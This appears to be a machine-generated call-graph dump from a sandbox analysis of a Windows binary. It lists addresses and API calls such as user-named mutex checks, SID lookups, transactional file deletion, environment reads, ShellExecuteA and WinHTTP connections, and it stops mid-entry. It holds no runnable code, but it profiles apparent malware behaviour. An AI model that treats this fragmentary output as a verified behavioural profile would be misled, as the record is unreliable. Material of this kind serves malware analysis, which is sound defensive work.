27 API calls 2 library calls 61930->63148 61931 42dc33 61936 42dc81 61931->61936 61937 42dc3e 61931->61937 61934 42dbf5 63163 4135c9 25 API calls 61934->63163 61935 42dad7 63149 4135c9 25 API calls 61935->63149 61943 41359c 27 API calls 61936->61943 63166 432c66 84 API calls 61937->63166 63164 432c66 84 API calls 61941->63164 61942 42dae3 61945 42daee 61942->61945 61960 42dc74 61943->61960 61944 42dc47 63167 432c66 84 API calls 61944->63167 61945->61890 61948 42dc96 61950 42dca0 61948->61950 61949 42dc53 63168 4330c3 27 API calls 61949->63168 63172 4360ce 28 API calls 61950->63172 61952 42dc5a 63169 42af9d 48 API calls swprintf 61952->63169 61955 42dca7 61957 435c2d 27 API calls 61955->61957 61956 42dc68 63170 4135c9 25 API calls 61956->63170 61959 42dcb0 61957->61959 61961 4135ea 27 API calls 61959->61961 63171 419340 102 API calls __EH_prolog 61960->63171 61962 42dcbc 61961->61962 63173 4169f1 CreateTransaction CreateDirectoryTransactedA CommitTransaction RollbackTransaction 61962->63173 61964 42dccb 63174 432c66 84 API calls 61964->63174 61966 42dcec 63175 432c66 84 API calls 61966->63175 61968 42eb80 61971 42eb90 WaitForSingleObject 61968->61971 61972 42eb95 61968->61972 61969 42dd07 63176 432c66 84 API calls 61969->63176 63177 432c66 84 API calls 61969->63177 61971->61972 61973 42eba4 61972->61973 61974 42eb9f WaitForSingleObject 61972->61974 61976 42ebb3 61973->61976 61977 42ebae WaitForSingleObject 61973->61977 61974->61973 61979 42ebc2 61976->61979 61980 42ebbd WaitForSingleObject 61976->61980 61977->61976 61978 42dd20 63178 432ca5 84 API calls __EH_prolog 61978->63178 61981 42ebd1 61979->61981 61982 42ebcc WaitForSingleObject 61979->61982 61980->61979 61984 42ebd8 WaitForSingleObject 61981->61984 61985 42ebdd 61981->61985 61982->61981 61984->61985 61986 42ebe7 WaitForSingleObject 61985->61986 61987 42ebec 61985->61987 61986->61987 61988 42ebf3 WaitForSingleObject 61987->61988 61989 42ebf8 61987->61989 61988->61989 61990 42ec06 WaitForSingleObject 61989->61990 61991 42ec0b CreateThread 61989->61991 61990->61991 61993 42ec30 61991->61993 63234 4360ce 28 API calls 61993->63234 61996 42ec37 61999 435c2d 27 API calls 61996->61999 61997 432ca5 84 API calls 62049 42dd37 61997->62049 61998 42dcf8 61998->61968 61998->61969 63233 432c66 84 API calls 61998->63233 62000 42ec40 GetModuleHandleA FreeLibrary 61999->62000 62001 42ec55 WaitForSingleObject 62000->62001 62002 42ec5e 62000->62002 62001->62002 63235 412bcd 27 API calls 62002->63235 62004 42ec6f 63236 412bcd 27 API calls 62004->63236 62006 42ec84 63237 412bcd 27 API calls 62006->63237 62008 42ec99 62009 42eca8 62008->62009 62010 42ee31 62009->62010 62011 42ecb0 62009->62011 62013 42ef42 62010->62013 62022 42ee46 62010->62022 62012 42ecbb 62011->62012 62014 42ecca 62012->62014 62015 42ef4f 62013->62015 63238 412739 62014->63238 62016 42ef57 62015->62016 62017 42f1f5 62015->62017 62020 42ef62 62016->62020 62019 42f1fc 62017->62019 62024 42f210 62019->62024 62025 42ef71 62020->62025 62021 42ecf4 63239 412739 62021->63239 62029 42ee8a 62022->62029 62030 42f223 62024->62030 62027 42ef88 62025->62027 62026 42ed07 62028 42ed1a 62026->62028 62035 42ef9b 62027->62035 62036 42ed2d 62028->62036 62031 42eec2 62029->62031 62045 42f25e 62030->62045 62032 42eed4 62031->62032 62033 42eee2 62032->62033 63242 412739 62033->63242 62040 42effc 62035->62040 62043 42ed8c 62036->62043 62038 42eefd 63243 41274a 62038->63243 62046 42f035 62040->62046 62041 42ef0b 62041->62033 62042 42ef13 62041->62042 62047 42ef2f 62042->62047 62048 42edc3 62043->62048 62044 432c66 84 API calls 62044->62049 62054 42f2e4 62045->62054 62050 42f048 62046->62050 63244 43f2d0 70 API calls 62047->63244 62052 42eddd 62048->62052 62049->61997 62049->62044 62091 42deb6 62049->62091 63179 424165 84 API calls __EH_prolog 62049->63179 62053 42f05b 62050->62053 62055 42edec 62052->62055 62057 42f06e 62053->62057 62054->62045 62056 42f30d 62054->62056 62059 42edfa 62055->62059 62061 4135ea 27 API calls 62056->62061 63245 412739 62057->63245 62059->62048 62060 42ee02 62059->62060 63240 41274a 62060->63240 62064 42f319 62061->62064 62062 42f081 63246 412739 62062->63246 62070 42f331 62064->62070 62066 42ee0f 62068 42ee1e 62066->62068 62067 42f093 62071 42f0b9 62067->62071 63241 43f2d0 70 API calls 62068->63241 62072 42f3a2 62070->62072 62074 42f117 62071->62074 62073 42f3c8 62072->62073 62075 42f3db 62073->62075 62076 42f150 62074->62076 62077 42f3ee 62075->62077 62078 42f162 62076->62078 62081 42f400 62077->62081 62079 42f175 62078->62079 62082 42f187 62079->62082 62086 42f426 62081->62086 62083 42f195 62082->62083 63247 41274a 62083->63247 62085 432c66 84 API calls 62085->62091 62094 42f44c 62086->62094 62087 42f1a1 62088 42f1b0 62087->62088 62090 42f1be 62088->62090 62090->62083 63248 43f2d0 70 API calls 62090->63248 62091->62085 62093 42e04c 62091->62093 63180 424165 84 API calls __EH_prolog 62091->63180 63181 432ca5 84 API calls __EH_prolog 62091->63181 62096 42e05f 62093->62096 62095 4135ea 27 API calls 62094->62095 62100 42f4be 62095->62100 62097 42e097 62096->62097 62098 42e0aa 62097->62098 62099 42e0bd 62098->62099 62101 42e0cc 62099->62101 62102 42f50f 62100->62102 63182 41274a 62101->63182 62105 42f522 62102->62105 62104 42e0d8 62106 42e0e7 62104->62106 62109 42f547 62105->62109 62106->62101 62107 42e0fd 62106->62107 62108 42e10a 62107->62108 62111 42e118 62108->62111 62110 42f56d 62109->62110 62121 42f580 62110->62121 63183 424165 84 API calls __EH_prolog 62111->63183 62113 42e121 62114 42e128 62113->62114 62115 4135ea 27 API calls 62114->62115 62129 42e154 62114->62129 62117 42e13f 62115->62117 62116 432c66 84 API calls 62116->62129 63188 432c66 84 API calls 62117->63188 62123 42f5de 62121->62123 62122 42e2cb 63189 432c66 84 API calls 62122->63189 62126 42f5f9 62123->62126 62125 42e2d7 63190 432ca5 84 API calls __EH_prolog 62125->63190 62133 42f608 62126->62133 62128 42e2e1 63191 412739 62128->63191 62129->62116 62132 42e1b2 62129->62132 63184 432ca5 84 API calls __EH_prolog 62129->63184 62131 42e2f8 63192 412739 62131->63192 62139 42e1c5 62132->62139 62140 42f616 62133->62140 62135 42e30b 63193 412739 62135->63193 62137 42e31e 63194 412739 62137->63194 62143 42e1ea 62139->62143 62140->62123 62144 4135ea 27 API calls 62140->62144 62141 42e331 63195 412739 62141->63195 62146 42e1fd 62143->62146 62147 42f645 62144->62147 62145 42e344 63196 412739 62145->63196 62149 42e210 62146->62149 62150 42f66f 62147->62150 62151 42e223 62149->62151 62158 42f682 62150->62158 63185 412739 62151->63185 62152 42e357 62154 42e37d 62152->62154 63197 412739 62154->63197 62156 42e390 63198 412739 62156->63198 62162 42f6bb 62158->62162 62159 42e3a2 62163 42e3b4 62159->62163 62160 42e236 62161 42e260 62160->62161 62164 42e26e 62161->62164 62171 42f6ce 62162->62171 62221 42e3cf 62163->62221 62164->62160 62165 42e283 62164->62165 62166 42e291 62165->62166 63186 424165 84 API calls __EH_prolog 62166->63186 62167 42e3fa 62241 42e408 62167->62241 62169 42e29a 63187 4241f1 27 API calls 2 library calls 62169->63187 62173 42f72d 62171->62173 62172 424165 84 API calls 62172->62241 62174 42f740 62173->62174 62178 42f753 62174->62178 62175 42e425 63199 432c66 84 API calls 62175->63199 62176 42e577 63210 432c66 84 API calls 62176->63210 62183 42f766 62178->62183 62180 42e432 63200 432c66 84 API calls 62180->63200 62181 42e584 63211 432c66 84 API calls 62181->63211 62197 42f781 62183->62197 62185 42e43e 63201 432ca5 84 API calls __EH_prolog 62185->63201 62186 42e590 63212 432ca5 84 API calls __EH_prolog 62186->63212 62189 42e448 63202 412739 62189->63202 62191 42e45f 63203 412739 62191->63203 62193 42e472 63204 412739 62193->63204 62195 42e485 63205 412739 62195->63205 62197->62183 62200 42f7b3 62197->62200 62198 42e59a 62203 42e5f9 62198->62203 62199 42e498 63206 412739 62199->63206 62202 42f7c1 62200->62202 62204 4135ea 27 API calls 62202->62204 62208 42e605 62203->62208 62205 42f7cd 62204->62205 63249 412739 62205->63249 62206 42e4ab 63207 412739 62206->63207 62211 42e622 62208->62211 62210 42f7f7 62219 42f80a 62210->62219 62211->62203 62214 42e637 62211->62214 62212 42e4e4 63208 412739 62212->63208 62216 42e645 62214->62216 62215 42e4f7 62217 42e509 62215->62217 63213 424165 84 API calls __EH_prolog 62216->63213 62217->62221 62222 42f845 62219->62222 62220 42e64e 62223 42e655 62220->62223 62221->62163 62221->62167 62221->62217 63250 412739 62222->63250 62226 42e681 62223->62226 62229 4135ea 27 API calls 62223->62229 62225 42f858 63251 412739 62225->63251 63214 432c66 84 API calls 62226->63214 62230 42e66c 62229->62230 63219 432c66 84 API calls 62230->63219 62231 42f86b 62233 42f87e 62231->62233 62236 42f890 62233->62236 63252 412739 62236->63252 62239 42f8a3 62246 42f8c8 62239->62246 62241->62172 62241->62175 62241->62176 63209 4330b2 27 API calls 62241->63209 62242 42e68e 62245 42e6de 62242->62245 63215 432c66 84 API calls 62242->63215 63216 432ca5 84 API calls __EH_prolog 62242->63216 62244 42e77d 62247 42e7cf 62244->62247 63220 432c66 84 API calls 62244->63220 63221 432ca5 84 API calls __EH_prolog 62244->63221 62249 42e6ee 62245->62249 62248 42f8ed 62246->62248 62268 42e7e2 62247->62268 62250 42f8fc 62248->62250 62251 42e712 62249->62251 63253 41274a 62250->63253 62254 42e720 62251->62254 62253 42f908 62255 42f925 62253->62255 62254->62249 62256 42e728 62254->62256 62255->62250 62257 42f92d 62255->62257 62258 42e735 62256->62258 62259 42f93a 62257->62259 62260 42e743 62258->62260 62262 42f948 62259->62262 63217 424165 84 API calls __EH_prolog 62260->63217 63218 4241f1 27 API calls 2 library calls 62260->63218 62263 4135ea 27 API calls 62262->62263 62265 42f954 62263->62265 62267 42f963 62265->62267 63254 4360ce 28 API calls 62267->63254 62271 4135ea 27 API calls 62268->62271 62283 42e876 62268->62283 63222 424165 84 API calls __EH_prolog 62268->63222 62270 42f96a 62272 435c2d 27 API calls 62270->62272 62274 42e864 62271->62274 62273 42f973 62272->62273 62277 42f98d 62273->62277 63226 432c66 84 API calls 62274->63226 62275 432c66 84 API calls 62275->62283 62281 435c2d 27 API calls 62277->62281 62278 42e97a 63227 432c66 84 API calls 62278->63227 62284 42f996 62281->62284 62282 42e986 63228 432ca5 84 API calls __EH_prolog 62282->63228 62283->62275 62286 42e8b0 62283->62286 63223 432ca5 84 API calls __EH_prolog 62283->63223 63255 43f2bc 70 API calls 62284->63255 62303 42e8c3 62286->62303 62288 42f9a4 63256 4360ce 28 API calls 62288->63256 62289 42e991 62292 42e9d1 62289->62292 62291 42f9b7 62293 435c2d 27 API calls 62291->62293 62295 42e9e4 62292->62295 62294 42f9c0 62293->62294 62296 4135ea 27 API calls 62294->62296 62298 42e9f3 62295->62298 62297 42f9cc 62296->62297 63257 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62297->63257 62306 42e9ff 62298->62306 62300 42f9db 63258 4360ce 28 API calls 62300->63258 62302 42f9fc 62304 435c2d 27 API calls 62302->62304 63224 424165 84 API calls __EH_prolog 62303->63224 63225 4241f1 27 API calls 2 library calls 62303->63225 62309 42fa05 62304->62309 62306->62298 63229 424165 84 API calls __EH_prolog 62306->63229 62311 435c2d 27 API calls 62309->62311 62312 42fa28 62311->62312 63259 43f2bc 70 API calls 62312->63259 62313 42ea4c 62316 4135ea 27 API calls 62313->62316 63230 4241f1 27 API calls 2 library calls 62313->63230 62315 42fa36 63260 4360ce 28 API calls 62315->63260 62317 42ea74 62316->62317 63231 416a44 109 API calls __EH_prolog 62317->63231 62320 42eaa1 62327 42eaaf 62320->62327 62321 42fa49 62322 435c2d 27 API calls 62321->62322 62323 42fa52 62322->62323 62324 4135ea 27 API calls 62323->62324 62326 42fa5e 62324->62326 62325 42eaba 62325->62327 62328 42ead8 62325->62328 63261 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62326->63261 62327->62325 62330 42dd28 62328->62330 62331 42eadc 62328->62331 62330->62328 62333 42dd2f 62330->62333 62331->62328 62332 42fa6d 63262 4360ce 28 API calls 62332->63262 62333->62049 62333->62330 63232 432c66 84 API calls 62333->63232 62335 42fa8e 62336 435c2d 27 API calls 62335->62336 62337 42fa97 62336->62337 62338 435c2d 27 API calls 62337->62338 62339 42faba 62338->62339 63263 43f2bc 70 API calls 62339->63263 62341 42fac8 63264 4360ce 28 API calls 62341->63264 62343 42fadb 62344 435c2d 27 API calls 62343->62344 62345 42fae4 62344->62345 62346 435c2d 27 API calls 62345->62346 62347 42fb07 62346->62347 63265 43f2bc 70 API calls 62347->63265 62349 42fb15 63266 4360ce 28 API calls 62349->63266 62351 42fb28 62352 435c2d 27 API calls 62351->62352 62353 42fb31 62352->62353 62354 4135ea 27 API calls 62353->62354 62355 42fb3d 62354->62355 63267 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62355->63267 62357 42fb4c 63268 4360ce 28 API calls 62357->63268 62359 42fc8f 62360 435c2d 27 API calls 62359->62360 62361 42fc98 62360->62361 63269 43f2bc 70 API calls 62361->63269 62363 42fe47 62364 42febb 62363->62364 63270 4360ce 28 API calls 62364->63270 62366 42ffc8 62367 435c2d 27 API calls 62366->62367 62368 42ffd1 62367->62368 63271 43f2bc 70 API calls 62368->63271 62370 4301cc 63272 4360ce 28 API calls 62370->63272 62372 430316 62373 435c2d 27 API calls 62372->62373 62374 43031f 62373->62374 63273 43f2bc 70 API calls 62374->63273 62376 4304ce 63274 4360ce 28 API calls 62376->63274 62378 4304e0 62379 435c2d 27 API calls 62378->62379 62380 4304e9 62379->62380 62381 430649 62380->62381 63275 43f2bc 70 API calls 62381->63275 62383 430672 63276 4360ce 28 API calls 62383->63276 62385 430684 62386 435c2d 27 API calls 62385->62386 62387 43068d 62386->62387 62388 4135ea 27 API calls 62387->62388 62389 430699 62388->62389 63277 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62389->63277 62391 4306a8 63278 43600d GetCurrentProcess OpenProcessToken GetUserProfileDirectoryA CloseHandle 62391->63278 62393 4306c7 62394 435c2d 27 API calls 62393->62394 62395 4309b6 62394->62395 63279 43f2bc 70 API calls 62395->63279 62397 430b65 63280 432c66 84 API calls 62397->63280 62399 430b74 62400 430c31 62399->62400 63281 432c66 84 API calls 62399->63281 63289 41adca 155 API calls __EH_prolog 62400->63289 62403 430b8c 63282 4330b2 27 API calls 62403->63282 62404 430c45 63290 4360ce 28 API calls 62404->63290 62406 430b93 62406->62400 62407 430b9c 62406->62407 63283 4360ce 28 API calls 62407->63283 62409 430c59 62410 435c2d 27 API calls 62409->62410 62412 430c62 62410->62412 63291 41a8ad 45 API calls 62412->63291 62413 430baf 62416 435c2d 27 API calls 62413->62416 62415 430c7c 63292 40c94b 63 API calls 62415->63292 62418 430bbd 62416->62418 62419 4135ea 27 API calls 62418->62419 62420 430bc5 62419->62420 63284 42b173 66 API calls 2 library calls 62420->63284 62422 430bcd 63285 4360ce 28 API calls 62422->63285 62423 430c8b 62426 430ea7 62423->62426 63293 41a8ad 45 API calls 62423->63293 62425 430cb8 63294 40c84c 66 API calls __EH_prolog 62425->63294 63309 4360ce 28 API calls 62426->63309 62429 430bde 62431 435c2d 27 API calls 62429->62431 62433 430be7 62431->62433 62432 430ec8 62434 435c2d 27 API calls 62432->62434 63286 43f2bc 70 API calls 62433->63286 62435 430ed1 62434->62435 62436 435c2d 27 API calls 62435->62436 62438 430ee0 62436->62438 63310 41a8ad 45 API calls 62438->63310 62439 430bfe 63287 4360ce 28 API calls 62439->63287 62440 430cce 63295 40c648 25 API calls 62440->63295 62442 430efa 63311 40c8ef 63 API calls 62442->63311 62446 430c0d 62447 435c2d 27 API calls 62446->62447 62448 430c16 62447->62448 62449 4135ea 27 API calls 62448->62449 62452 430c22 62449->62452 62450 430f09 62458 430fa5 62450->62458 63312 41a8ad 45 API calls 62450->63312 63288 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62452->63288 62453 430e86 63306 40af5f 25 API calls 62453->63306 62454 430f36 63313 4165a8 63 API calls 62454->63313 63317 4360ce 28 API calls 62458->63317 62459 430e91 63307 40af5f 25 API calls 62459->63307 62460 430f45 62460->62458 62467 430f5a 62460->62467 62463 430e9c 63308 40af5f 25 API calls 62463->63308 62465 430fd7 62468 435c2d 27 API calls 62465->62468 63314 43f2e5 70 API calls 62467->63314 62471 430fe3 62468->62471 62473 435c2d 27 API calls 62471->62473 62472 430f67 62474 435c2d 27 API calls 62472->62474 62476 430ff2 62473->62476 62477 430f76 62474->62477 63318 41a8ad 45 API calls 62476->63318 63315 43f2bc 70 API calls 62477->63315 62480 43100c 63319 40c8ef 63 API calls 62480->63319 62481 430f84 62484 4135ea 27 API calls 62481->62484 62483 430d0d 62483->62453 62498 430d94 62483->62498 63296 40ba2d 55 API calls 62483->63296 63297 4149e7 45 API calls 62483->63297 63298 4165a8 63 API calls 62483->63298 63305 40c896 61 API calls 62483->63305 62485 430f96 62484->62485 63316 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62485->63316 62487 43101b 62493 43125c 62487->62493 63320 43f2e5 70 API calls 62487->63320 62491 431044 63321 41a8ad 45 API calls 62491->63321 63334 424165 84 API calls __EH_prolog 62493->63334 62494 431058 63322 40c84c 66 API calls __EH_prolog 62494->63322 62497 431283 63335 4241f1 27 API calls 2 library calls 62497->63335 63299 40ba2d 55 API calls 62498->63299 63300 40ba2d 55 API calls 62498->63300 62501 430dcc lstrlenA 63301 41336c 27 API calls 62501->63301 62502 431291 63336 433cf5 80 API calls 2 library calls 62502->63336 62505 43106e 63323 40c648 25 API calls 62505->63323 62506 4312b2 63337 43f2f4 WriteFile UnmapViewOfFile CloseHandle CloseHandle ISource 62506->63337 62507 435c2d 27 API calls 62519 430def 62507->62519 62511 43123b 63331 40af5f 25 API calls 62511->63331 62513 431246 63332 40af5f 25 API calls 62513->63332 62515 431251 63333 40af5f 25 API calls 62515->63333 62519->62507 63302 43f2bc 70 API calls 62519->63302 63303 40ba2d 55 API calls 62519->63303 63304 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62519->63304 62523 4312cb 62525 43137e 62523->62525 63338 4360ce 28 API calls 62525->63338 62527 4313a0 62528 435c2d 27 API calls 62527->62528 62529 4313a9 62528->62529 62530 4135ea 27 API calls 62529->62530 62531 4313b5 62530->62531 63339 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62531->63339 62534 435c2d 27 API calls 62537 431137 62534->62537 62536 40ba2d 55 API calls 62536->62537 62537->62534 62537->62536 63327 40bc19 27 API calls 62537->63327 63328 43f2bc 70 API calls 62537->63328 63329 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62537->63329 62539 4310ad 62539->62511 62539->62537 63324 40ba2d 55 API calls 62539->63324 63325 4149e7 45 API calls 62539->63325 63326 4165a8 63 API calls 62539->63326 63330 40c896 61 API calls 62539->63330 62540 4313c4 62541 4314f8 62540->62541 63340 4360ce 28 API calls 62541->63340 62543 43151b 62544 435c2d 27 API calls 62543->62544 62545 431524 62544->62545 62546 4135ea 27 API calls 62545->62546 62547 431530 62546->62547 63341 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62547->63341 62549 43153f 63342 4360ce 28 API calls 62549->63342 62551 43155f 62552 435c2d 27 API calls 62551->62552 62553 431568 62552->62553 63343 41a8ad 45 API calls 62553->63343 62555 431581 63344 40c5a5 57 API calls __EH_prolog 62555->63344 62557 431597 63345 40c648 25 API calls 62557->63345 62559 43165d 63350 40af5f 25 API calls 62559->63350 62561 431668 63351 40af5f 25 API calls 62561->63351 62563 431673 63352 40af5f 25 API calls 62563->63352 62566 431682 63353 4360ce 28 API calls 62566->63353 62570 431693 62572 435c2d 27 API calls 62570->62572 62571 431611 63347 40ba2d 55 API calls 62571->63347 63348 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62571->63348 62574 43169c 62572->62574 63354 41a8ad 45 API calls 62574->63354 62575 4315d6 62575->62559 62575->62571 63346 4165a8 63 API calls 62575->63346 63349 40c5f2 29 API calls 62575->63349 62577 4316b5 63355 40c5a5 57 API calls __EH_prolog 62577->63355 62579 4316cb 63356 40c648 25 API calls 62579->63356 62581 431791 63361 40af5f 25 API calls 62581->63361 62583 43179c 63362 40af5f 25 API calls 62583->63362 62585 4317a7 63363 40af5f 25 API calls 62585->63363 62588 4317b6 63364 4360ce 28 API calls 62588->63364 62592 4317c7 62594 435c2d 27 API calls 62592->62594 62593 431745 63358 40ba2d 55 API calls 62593->63358 63359 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62593->63359 62596 4317d0 62594->62596 62597 4135ea 27 API calls 62596->62597 62599 4317dc 62597->62599 62598 43170a 62598->62581 62598->62593 63357 4165a8 63 API calls 62598->63357 63360 40c5f2 29 API calls 62598->63360 63365 42b011 CreateTransaction RemoveDirectoryTransactedA CommitTransaction RollbackTransaction 62599->63365 62601 4317eb 63366 4360ce 28 API calls 62601->63366 62603 43180b 62604 435c2d 27 API calls 62603->62604 62605 431814 62604->62605 62606 4135ea 27 API calls 62605->62606 62607 431820 62606->62607 63367 40c9fc CreateTransaction DeleteFileTransactedA CommitTransaction RollbackTransaction 62607->63367 62609 43182f 63368 432c66 84 API calls 62609->63368 62611 43266e 63375 424165 84 API calls __EH_prolog 62611->63375 62613 4326e6 62620 43270b 62613->62620 63376 424165 84 API calls __EH_prolog 62613->63376 62615 4326fa 63377 4330b2 27 API calls 62615->63377 62617 432701 62618 432706 62617->62618 62617->62620 63378 4394c8 52 API calls __cftof 62618->63378 63379 432ada 25 API calls 62620->63379 63380 422597 84 API calls _Deallocate 62630->63380 62631 431b19 GetEnvironmentVariableA 62651 43185c 62631->62651 62633 432c66 84 API calls 62633->62651 62634 4330b2 27 API calls 62634->62651 62635 4135ea 27 API calls 62635->62651 62636 4241f1 27 API calls 62653 431fee 62636->62653 62637 432ca5 84 API calls 62637->62651 62639 424165 84 API calls 62639->62651 62640 41a8ad 45 API calls 62640->62651 62641 40c8ef 63 API calls 62641->62651 62642 4135ea 27 API calls 62642->62653 62644 432650 ShellExecuteA 62644->62651 62645 424165 84 API calls 62645->62653 62647 435c2d 27 API calls 62647->62651 62650 432c66 84 API calls 62650->62653 62651->62611 62651->62631 62651->62633 62651->62634 62651->62635 62651->62637 62651->62639 62651->62640 62651->62641 62651->62647 62651->62653 63369 43605b 42 API calls 62651->63369 63373 4241f1 27 API calls 2 library calls 62651->63373 62652 435c2d 27 API calls 62652->62653 62653->62636 62653->62642 62653->62644 62653->62645 62653->62650 62653->62652 62654 432186 ShellExecuteA 62653->62654 63370 434908 62 API calls 2 library calls 62653->63370 63371 432ca5 84 API calls __EH_prolog 62653->63371 63372 434908 62 API calls 2 library calls 62653->63372 63374 434908 62 API calls 2 library calls 62653->63374 62654->62651 62655->61321 62656->61329 62657->61331 62658->61334 62659->61313 62660->61315 62661->61318 62662->61338 62663->61340 62664->61341 62666 40966d 62665->62666 62671 414066 62666->62671 62672 414070 62671->62672 62672->62672 62678 41350d 62672->62678 62674 409690 62675 440cfa 62674->62675 62683 440ccd 62675->62683 62679 413540 62678->62679 62680 41351c ctype 62678->62680 62682 415025 27 API calls 2 library calls 62679->62682 62680->62674 62682->62680 62684 440ce3 62683->62684 62685 440cdc 62683->62685 62692 455305 62684->62692 62689 455299 62685->62689 62688 40969a 62688->61344 62690 455305 28 API calls 62689->62690 62691 4552ab 62690->62691 62691->62688 62695 45503b 62692->62695 62696 455047 ___scrt_is_nonwritable_in_current_image 62695->62696 62703 452e47 EnterCriticalSection 62696->62703 62698 455055 62704 455096 62698->62704 62700 455062 62714 45508a LeaveCriticalSection std::_Lockit::~_Lockit 62700->62714 62702 455073 62702->62688 62703->62698 62705 4550b2 62704->62705 62713 455129 _unexpected 62704->62713 62712 455109 62705->62712 62705->62713 62715 4611a8 62705->62715 62706 4611a8 28 API calls 62709 45511f 62706->62709 62708 4550ff 62724 45813e 14 API calls __dosmaperr 62708->62724 62725 45813e 14 API calls __dosmaperr 62709->62725 62712->62706 62712->62713 62713->62700 62714->62702 62716 4611b5 62715->62716 62717 4611d0 62715->62717 62716->62717 62719 4611c1 62716->62719 62718 4611df 62717->62718 62739 467463 26 API calls 2 library calls 62717->62739 62726 45e7ec 62718->62726 62738 44c424 14 API calls __dosmaperr 62719->62738 62723 4611c6 __cftof 62723->62708 62724->62712 62725->62713 62727 45e804 62726->62727 62728 45e7f9 62726->62728 62730 45e80c 62727->62730 62736 45e815 _strftime 62727->62736 62740 45a421 62728->62740 62747 45813e 14 API calls __dosmaperr 62730->62747 62732 45e83f RtlReAllocateHeap 62734 45e801 62732->62734 62732->62736 62733 45e81a 62748 44c424 14 API calls __dosmaperr 62733->62748 62734->62723 62736->62732 62736->62733 62749 45463d EnterCriticalSection LeaveCriticalSection std::_Facet_Register 62736->62749 62738->62723 62739->62718 62741 45a45f 62740->62741 62745 45a42f _strftime 62740->62745 62742 44c424 __dosmaperr 14 API calls 62741->62742 62744 45a45d 62742->62744 62743 45a44a RtlAllocateHeap 62743->62744 62743->62745 62744->62734 62745->62741 62745->62743 62746 45463d std::_Facet_Register EnterCriticalSection LeaveCriticalSection 62745->62746 62746->62745 62747->62734 62748->62734 62749->62736 62751 454b2b 62750->62751 62754 454b41 62750->62754 62751->62754 62756 454b7a 62751->62756 62753 454b38 62753->62754 62769 454e27 15 API calls 3 library calls 62753->62769 62754->61349 62757 454b86 62756->62757 62758 454b83 62756->62758 62770 460de0 62757->62770 62758->62753 62763 454b98 62790 45813e 14 API calls __dosmaperr 62763->62790 62765 454ba3 62789 45813e 14 API calls __dosmaperr 62765->62789 62767 454bc7 62767->62753 62769->62754 62771 454b8d 62770->62771 62772 460de9 62770->62772 62776 4610d4 GetEnvironmentStringsW 62771->62776 62791 45a28c 42 API calls 3 library calls 62772->62791 62774 460e0c 62792 460c2c 51 API calls 3 library calls 62774->62792 62777 4610eb 62776->62777 62787 461141 62776->62787 62793 45b5e8 62777->62793 62778 454b92 62778->62763 62788 454c1b 25 API calls 3 library calls 62778->62788 62779 46114a FreeEnvironmentStringsW 62779->62778 62781 461104 62782 45a421 _strftime 15 API calls 62781->62782 62781->62787 62783 461114 62782->62783 62784 46112c 62783->62784 62785 45b5e8 __cftof WideCharToMultiByte 62783->62785 62796 45813e 14 API calls __dosmaperr 62784->62796 62785->62784 62787->62778 62787->62779 62788->62765 62789->62763 62790->62767 62791->62774 62792->62771 62794 45b5ff WideCharToMultiByte 62793->62794 62794->62781 62796->62787 62798 42b3d9 GetUserDefaultLCID GetLocaleInfoA 62797->62798 62798->61362 62800 436588 62799->62800 62800->62800 63383 436235 GetUserNameA 62800->63383 62802 43659f 62803 435c2d 27 API calls 62802->62803 62804 4365a9 OpenMutexA 62803->62804 62805 42b6bd 62804->62805 62806 4365bc CreateMutexA 62804->62806 62805->61367 62807 439263 GetCurrentProcess OpenProcessToken 62805->62807 62806->62805 62808 439286 GetTokenInformation 62807->62808 62811 42b6ca 62807->62811 62809 4392a0 GetLastError 62808->62809 62810 4392ab GlobalAlloc GetTokenInformation 62808->62810 62809->62810 62809->62811 62810->62811 62812 4392ce ConvertSidToStringSidW 62810->62812 62811->61370 62811->61371 62812->62811 62813 4392e2 62812->62813 63384 451c4c 43 API calls 3 library calls 62813->63384 62815 4392ef GlobalFree 62815->62811 62818 414066 27 API calls 62817->62818 62819 413606 62818->62819 62819->61375 62822 41a86e 62820->62822 62823 41a881 62822->62823 63385 446e30 44 API calls 2 library calls 62822->63385 62824 41a8a3 62823->62824 63386 446e30 44 API calls 2 library calls 62823->63386 62824->61380 62828 415c4e __EH_prolog 62826->62828 62827 415df5 62827->61387 62828->62827 62830 415d69 __cftof 62828->62830 63387 446d10 44 API calls 2 library calls 62828->63387 63388 41402b 27 API calls 62828->63388 62830->62827 63389 41402b 27 API calls 62830->63389 63390 4140e0 62833->63390 62835 41365c 62836 416047 62835->62836 62837 416051 __EH_prolog 62836->62837 62838 4140e0 27 API calls 62837->62838 62839 41607c 62838->62839 63395 415edd 62839->63395 62842 4140e0 27 API calls 62843 41609a 62842->62843 63399 415f61 62843->63399 62846 414005 25 API calls 62847 4160ac 62846->62847 62848 414005 25 API calls 62847->62848 62849 4160b4 62848->62849 62849->61392 63412 413e72 62850->63412 62854 434508 __EH_prolog 62853->62854 62855 43453e WinHttpOpen 62854->62855 62856 434552 62855->62856 63421 433cd0 62856->63421 62858 434574 62859 4348dc WinHttpCloseHandle 62858->62859 62860 4345d5 62858->62860 62861 43462a 62858->62861 62862 41359c 27 API calls 62859->62862 62863 414066 27 API calls 62860->62863 62865 414066 27 API calls 62861->62865 62864 4348ef 62862->62864 62866 4345ed 62863->62866 62867 414005 25 API calls 62864->62867 62868 434642 62865->62868 62869 4390c6 29 API calls 62866->62869 62870 4348f7 62867->62870 62871 4390c6 29 API calls 62868->62871 62872 4345ff WinHttpConnect 62869->62872 62870->61422 62873 434654 WinHttpConnect 62871->62873 62876 413e27 25 API calls 62872->62876 62877 413e27 25 API calls 62873->62877 62878 434625 62876->62878 62877->62878 62879 414005 25 API calls 62878->62879 62880 434682 62879->62880 62881 4348d2 WinHttpCloseHandle 62880->62881 62882 434703 62880->62882 62883 434697 62880->62883 62881->62859 62884 414066 27 API calls 62882->62884 62885 